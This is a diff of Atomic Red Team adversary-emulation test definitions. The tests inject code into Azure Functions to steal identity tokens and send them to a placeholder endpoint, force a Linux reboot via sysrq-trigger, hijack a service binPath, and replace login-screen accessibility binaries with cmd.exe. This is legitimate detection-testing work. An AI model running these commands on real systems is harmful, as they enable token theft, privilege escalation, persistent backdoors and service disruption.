+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
 ```


@@ -1,60 +1,218 @@
 attack_technique: T1528
-display_name: Steal Application Access Token
+display_name: 'Steal Application Access Token'
 atomic_tests:
- name: Azure - Dump All Azure Key Vaults with Microburst
-  auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea
+- name: Azure - Functions code upload - Functions code injection via Blob upload
+  auto_generated_guid: 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43
  description: |-
-    Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
-    See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
+    This test injects code into an Azure Function (RCE).
+
+    Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+    Similar to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
+
+    Note:
+    - The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations). 
+    - For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
+    - The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+
+    Requirements:
+    - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+    - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
  supported_platforms:
-  - iaas:azure
+    - iaas:azure
  input_arguments:
-    username:
-      description: Azure AD username
+    storage_account_name:
      type: string
-      default:
-    password:
-      description: Azure AD password
+      default: storage_account_name_example
+      description: Name of storage account that is related to the Function
+    container_name:
      type: string
-      default: T1082Az
-    output_file:
-      description: File to dump results to
+      default: container_name_example
+      description: Name of the container that contains the function blob
+    blob_name:
      type: string
-      default: $env:temp\T1528Test1.txt
-    subscription_id:
-      description: Azure subscription id to search
-      type: string
-      default:
+      default: blob_example
+      description: Name of the function blob
+    file_path_blob:
+      type: path
+      default: $env:temp/T1528_function_code.zip
+      description: Path to the function code file to upload as blob
  dependency_executor_name: powershell
  dependencies:
-  - description: |
-      The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
-    prereq_command: |
-      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-  - description: |
-      The Azure RM module must be installed.
-    prereq_command: |
-      try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-    get_prereq_command: |
-      Install-Module -Name AzureRM -Force -allowclobber
-  - description: |
-      The Azure module must be installed.
-    prereq_command: |
-      try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-    get_prereq_command: |
-      Install-Module -Name Azure -Force -allowclobber
+    - description: Azure CLI must be installed
+      prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+      get_prereq_command: Install-Module -Name Az -Force
  executor:
    command: |
-      import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
-      $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
-      Connect-AzureRmAccount -Credential $Credential
-      Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
-      cat #{output_file}
-    cleanup_command: |
-      remove-item #{output_file} -force -erroraction silentlycontinue
+      az login    # Log in to Azure CLI
+
+      $allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+      if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+          Write-Output "Shared key access is disabled for this storage account."
+      } else {    
+          $connectionString = az storage account show-connection-string --name "#{storage_account_name}" --query connectionString --output tsv
+
+          # Download blob for cleanup
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+          az storage blob download --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file $tmpOriginalFunctionCode --overwrite true
+
+          if ($LASTEXITCODE -eq 0) {
+              # Upload new blob version if download of existing blob succeeded
+              az storage blob upload --connection-string $connectionString --container-name "#{container_name}" --name "#{blob_name}" --file "#{file_path_blob}" --overwrite true
+          } else {
+              Write-Output "Download original function code failed."
+              exit 1
+          }
+      }
+    cleanup_command: |-
+      az login    # Log in to Azure CLI
+
+      # Upload previous funciton code
+      $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + "#{blob_name}")
+      az storage blob upload --account-name "#{storage_account_name}" --container-name "#{container_name}" --file $tmpOriginalFunctionCode --name "#{blob_name}" --overwrite true 2>$null
+
+      if ($LASTEXITCODE -eq 0) {
+          Write-Output "Uploaded original version of function code."
+
+          # Delete tmp original blob file if upload succeeded
+          Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+          Write-Output "Deleted tmp original blob file: $($tmpOriginalFunctionCode)"
+      } else {
+          Write-Output "Upload original function code failed."
+      }
    name: powershell
-    elevation_required: true
+    elevation_required: false
+- name: Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token
+  auto_generated_guid: 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1
+  description: |-
+    This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
+
+    Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
+
+    Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
+
+    Note: 
+    - The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
+    - For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1528 "Azure - Functions code upload - Functions code injection via Blob upload".
+    - The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
+    - Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
+    - The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
+
+    Requirements:
+    - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
+    - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
+
+    Execution options: Defined by the input field execution_option
+    - insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
+    - replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
+  supported_platforms:
+    - iaas:azure
+  input_arguments:
+    storage_account_name:
+      type: string
+      default: storage_account_name_example
+      description: Name of storage account that is related to the Function
+    execution_option:
+      type: string
+      default: insert_code
+      description: Chooses execution option insert_code, or replace_file
+    file_share_name:
+      type: string
+      default: file_share_name_example
+      description: Name of the file share that is related to the Function
+    file_path:
+      type: path
+      default: site/wwwroot/function_app.py
+      description: Path to the Function file in the file share
+    code_to_insert_path:
+      type: path
+      default: $PathToAtomicsFolder/T1528/src/code_to_insert.py
+      description: The code that will be injected into the Function
+  dependency_executor_name: powershell
+  dependencies:
+    - description: Azure CLI must be installed
+      prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+      get_prereq_command: Install-Module -Name Az -Force
+  executor:
+    command: |-
+      az login    # Log in to Azure CLI
+
+      $allowSharedKeyAccess = az storage account show --name "#{storage_account_name}" --query "allowSharedKeyAccess"
+
+      if ($allowSharedKeyAccess -eq "false") {    # $allowSharedKeyAccess could be true or null
+          Write-Output "Shared key access is disabled for this storage account."
+      } else {
+          # Download file for cleanup
+          $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+          $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+          az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpOriginalFunctionCode
+
+          if ($LASTEXITCODE -eq 0) {
+              # Upload new funciton code if download of existing code succeeded
+              if ("#{execution_option}" -eq "insert_code") {
+                  # Download file from file share for injection
+                  $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+                  az storage file download --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --only-show-errors --dest $tmpFunctionCode
+                  
+                  if ($LASTEXITCODE -ne 0) {
+                      Write-Output "Function code download failed."
+                      exit 1
+                  }
+                  Write-Output "File downloaded: $($tmpFunctionCode)"
+                  
+                  $insertContent = Get-Content -Path "#{code_to_insert_path}" -Raw  # Load the content of the insert file
+                  
+                  $content = Get-Content -Path $tmpFunctionCode -Raw  # Inject code to file
+                  $content = $insertContent + "`n" + $content     # Insert the new code at the beginning
+                  $content | Set-Content -Path $tmpFunctionCode       # Write the modified content to the file
+                  
+                  # Upload file to file share
+                  az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpFunctionCode --only-show-errors
+                  if ($LASTEXITCODE -ne 0) {
+                      Write-Output "Function code upload failed."
+                      exit 1
+                  }
+                  Write-Output "Uploaded the tampered file"
+              } elseif ("#{execution_option}" -eq "replace_file") {
+                  az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source "#{code_to_insert_path}" --only-show-errors
+                  if ($LASTEXITCODE -ne 0) {
+                      Write-Output "Function code upload failed."
+                      exit 1
+                  }
+                  Write-Output "Uploaded the tampered file"
+              } else {
+                  Write-Output "Please choose a valid execution_option"
+                  exit 1
+              }
+          } else {
+              Write-Output "Download original function code failed."
+              exit 1
+          }
+      }
+    cleanup_command: |-
+      az login    # Log in to Azure CLI
+
+      # Upload previous funciton code
+      $tmpOriginalFileName = [System.IO.Path]::GetFileName("#{file_path}")
+      $tmpOriginalFunctionCode = Join-Path $env:temp/ ("T1528_tmp_original_" + $tmpOriginalFileName)
+      az storage file upload --account-name "#{storage_account_name}" --share-name "#{file_share_name}" -p "#{file_path}" --source $tmpOriginalFunctionCode --only-show-errors 2>$null
+
+      if ($LASTEXITCODE -eq 0) {
+          Write-Output "Uploaded original version of function code."
+
+          # Delete tmp original f file if upload succeeded
+          if ("#{execution_option}" -eq "insert_code") {
+              $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName)
+              Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue
+              Write-Output "Deleted tmp file: $($tmpFunctionCode)"
+          }
+
+          # Delete tmp original file
+          Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue
+          Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)"
+      } else {
+          Write-Output "Upload original function code failed."
+      }
+    name: powershell
+    elevation_required: false
@@ -42,6 +42,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other

 - [Atomic Test #15 - ESXi - vim-cmd Used to Power Off VMs](#atomic-test-15---esxi---vim-cmd-used-to-power-off-vms)

+- [Atomic Test #16 - Abuse of Linux Magic System Request Key for Reboot](#atomic-test-16---abuse-of-linux-magic-system-request-key-for-reboot)
+

 <br/>

@@ -550,4 +552,32 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #16 - Abuse of Linux Magic System Request Key for Reboot
+adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can forced to reboot.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** d2a1f4bc-a064-4223-8281-a086dce5423c
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+echo "b" > /proc/sysrq-trigger
+```
+
+
+
+
+
+
 <br/>
@@ -278,3 +278,14 @@ atomic_tests:
      echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/power.off $i & done"
    name: command_prompt
    elevation_required: false
+- name: Abuse of Linux Magic System Request Key for Reboot
+  auto_generated_guid: d2a1f4bc-a064-4223-8281-a086dce5423c
+  description: |
+    adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can forced to reboot.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      echo "b" > /proc/sysrq-trigger
+    name: bash
+    elevation_required: true
@@ -18,131 +18,14 @@ Adversaries may also obtain then abuse leaked credentials from source repositori

 ## Atomic Tests

- [Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst](#atomic-test-1---azure---enumerate-azure-blobs-with-microburst)
+- [Atomic Test #1 - AWS - Scan for Anonymous Access to S3](#atomic-test-1---aws---scan-for-anonymous-access-to-s3)

- [Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)](#atomic-test-2---azure---scan-for-anonymous-access-to-azure-storage-powershell)
-
- [Atomic Test #3 - AWS - Scan for Anonymous Access to S3](#atomic-test-3---aws---scan-for-anonymous-access-to-s3)
-
- [Atomic Test #4 - Azure - Dump Azure Storage Account Objects via Azure CLI](#atomic-test-4---azure---dump-azure-storage-account-objects-via-azure-cli)
+- [Atomic Test #2 - Azure - Dump Azure Storage Account Objects via Azure CLI](#atomic-test-2---azure---dump-azure-storage-account-objects-via-azure-cli)


 <br/>

-## Atomic Test #1 - Azure - Enumerate Azure Blobs with MicroBurst
-Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. 
-See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** 3dab4bcc-667f-4459-aea7-4162dd2d6590
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| base | Azure blob keyword to enumerate (Example, storage account name) | string | secure|
-| output_file | File to output results to | string | $env:temp&#92;T1530Test1.txt|
-| wordlist | File path to keywords for search permutations | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;permutations.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
-```
-
-#### Cleanup Commands:
-```powershell
-remove-item #{output_file} -erroraction silentlycontinue
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
-##### Check Prereq Commands:
-```powershell
-if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-```
-##### Description: The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
-##### Check Prereq Commands:
-```powershell
-if (test-path "#{wordlist}"){exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Azure - Scan for Anonymous Access to Azure Storage (Powershell)
-Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
-The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
-See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** 146af1f1-b74e-4aa7-9895-505eb559b4b0
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| base_name | Azure storage account name to test | string | T1530Test2|
-| output_file | File to output results to | string | $env:temp&#92;T1530Test2.txt|
-| container_name | Container name to search for (optional) | string | |
-| blob_name | Blob name to search for (optional) | string | |
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
-catch [system.net.webexception]
-{if($_.Exception.Response -ne $null)
-{$Response = $_.Exception.Response.GetResponseStream()
-$ReadResponse = New-Object System.IO.StreamReader($Response)
-$ReadResponse.BaseStream.Position = 0
-$responseBody = $ReadResponse.ReadToEnd()}
-else {$responseBody = "The storage account could not be anonymously accessed."}}
-"Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
-```
-
-#### Cleanup Commands:
-```powershell
-remove-item #{output_file} -erroraction silentlycontinue
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - AWS - Scan for Anonymous Access to S3
+## Atomic Test #1 - AWS - Scan for Anonymous Access to S3
 Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder.

 **Supported Platforms:** Iaas:aws
@@ -196,7 +79,7 @@ echo Please install the aws-cli and configure your AWS default profile using: aw
 <br/>
 <br/>

-## Atomic Test #4 - Azure - Dump Azure Storage Account Objects via Azure CLI
+## Atomic Test #2 - Azure - Dump Azure Storage Account Objects via Azure CLI
 This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName".

 Requirements:
@@ -1,87 +1,6 @@
 attack_technique: T1530
 display_name: Data from Cloud Storage Object
 atomic_tests:
- name: Azure - Enumerate Azure Blobs with MicroBurst
-  auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
-  description: |
-    Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. 
-    See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ . 
-  supported_platforms:
-  - iaas:azure
-  input_arguments:
-    base:
-      description: Azure blob keyword to enumerate (Example, storage account name)
-      type: string
-      default: secure
-    output_file:
-      description: File to output results to
-      type: string
-      default: $env:temp\T1530Test1.txt
-    wordlist:
-      description: File path to keywords for search permutations
-      type: string
-      default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
-    prereq_command: |
-      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-  - description: |
-      The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
-    prereq_command: |
-      if (test-path "#{wordlist}"){exit 0} else {exit 1}
-    get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
-  executor:
-    command: |
-      import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
-      Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
-    cleanup_command: |
-      remove-item #{output_file} -erroraction silentlycontinue
-    name: powershell
- name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
-  auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
-  description: |
-    Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file. 
-    The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information. 
-    See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service     
-  supported_platforms:
-  - iaas:azure
-  input_arguments:
-    base_name:
-      description: Azure storage account name to test
-      type: string
-      default: T1530Test2
-    output_file:
-      description: File to output results to
-      type: string
-      default: $env:temp\T1530Test2.txt
-    container_name:
-      description: Container name to search for (optional)
-      type: string
-      default:
-    blob_name:
-      description: Blob name to search for (optional)
-      type: string
-      default:
-  executor:
-    command: |
-      try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
-      catch [system.net.webexception]
-      {if($_.Exception.Response -ne $null)
-      {$Response = $_.Exception.Response.GetResponseStream()
-      $ReadResponse = New-Object System.IO.StreamReader($Response)
-      $ReadResponse.BaseStream.Position = 0
-      $responseBody = $ReadResponse.ReadToEnd()}
-      else {$responseBody = "The storage account could not be anonymously accessed."}}
-      "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
-    cleanup_command: |
-      remove-item #{output_file} -erroraction silentlycontinue
-    name: powershell
 - name: AWS - Scan for Anonymous Access to S3
  auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5
  description: |
@@ -45,18 +45,24 @@ Upon successful execution, cmd will modify the binpath for `Fax` to spawn powers



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | The name of the service that will be modified | string | Fax|
+| service_binpath | The default value for the binary path of the service | string | C:&#92;WINDOWS&#92;system32&#92;fxssvc.exe|
+

 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-sc start Fax
+sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+sc start #{service_name}
 ```

 #### Cleanup Commands:
 ```cmd
-sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
+sc config #{service_name} binPath= "#{service_binpath}" >nul 2>&1
 ```


@@ -10,15 +10,24 @@ atomic_tests:
    Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
  supported_platforms:
  - windows
-
+  input_arguments:
+    service_name:
+      description: The name of the service that will be modified
+      type: string
+      default: Fax
+    service_binpath:
+      description: The default value for the binary path of the service
+      type: string
+      default: C:\WINDOWS\system32\fxssvc.exe
  executor:
    name: command_prompt
    elevation_required: true
    command: |
-      sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
-      sc start Fax
-    cleanup_command:
-      sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
+      sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
+      sc start #{service_name}
+    cleanup_command: |
+      sc config #{service_name} binPath= "#{service_binpath}" >nul 2>&1
+
 - name: Service Installation CMD
  auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
  description: |
@@ -38,6 +38,10 @@ Other accessibility features exist that may also be leveraged in a similar fashi

 - [Atomic Test #8 - Replace Narrator.exe (Narrator binary) with cmd.exe](#atomic-test-8---replace-narratorexe-narrator-binary-with-cmdexe)

+- [Atomic Test #9 - Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe](#atomic-test-9---replace-displayswitchexe-display-switcher-binary-with-cmdexe)
+
+- [Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe](#atomic-test-10---replace-atbrokerexe-app-switcher-binary-with-cmdexe)
+

 <br/>

@@ -353,4 +357,74 @@ copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe



+<br/>
+<br/>
+
+## Atomic Test #9 - Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Replace AtBroker.exe (App Switcher binary) with cmd.exe
+Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 210be7ea-d841-40ec-b3e1-ff610bb62744
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+takeown /F C:\Windows\System32\AtBroker.exe /A
+icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+```
+
+
+
+
+
 <br/>
@@ -169,3 +169,35 @@ atomic_tests:
      copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
    name: command_prompt
    elevation_required: true
+- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
+  auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
+  description: |
+    Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\DisplaySwitch.exe /A
+      icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
+    name: command_prompt
+    elevation_required: true
+- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+  auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+  description: |
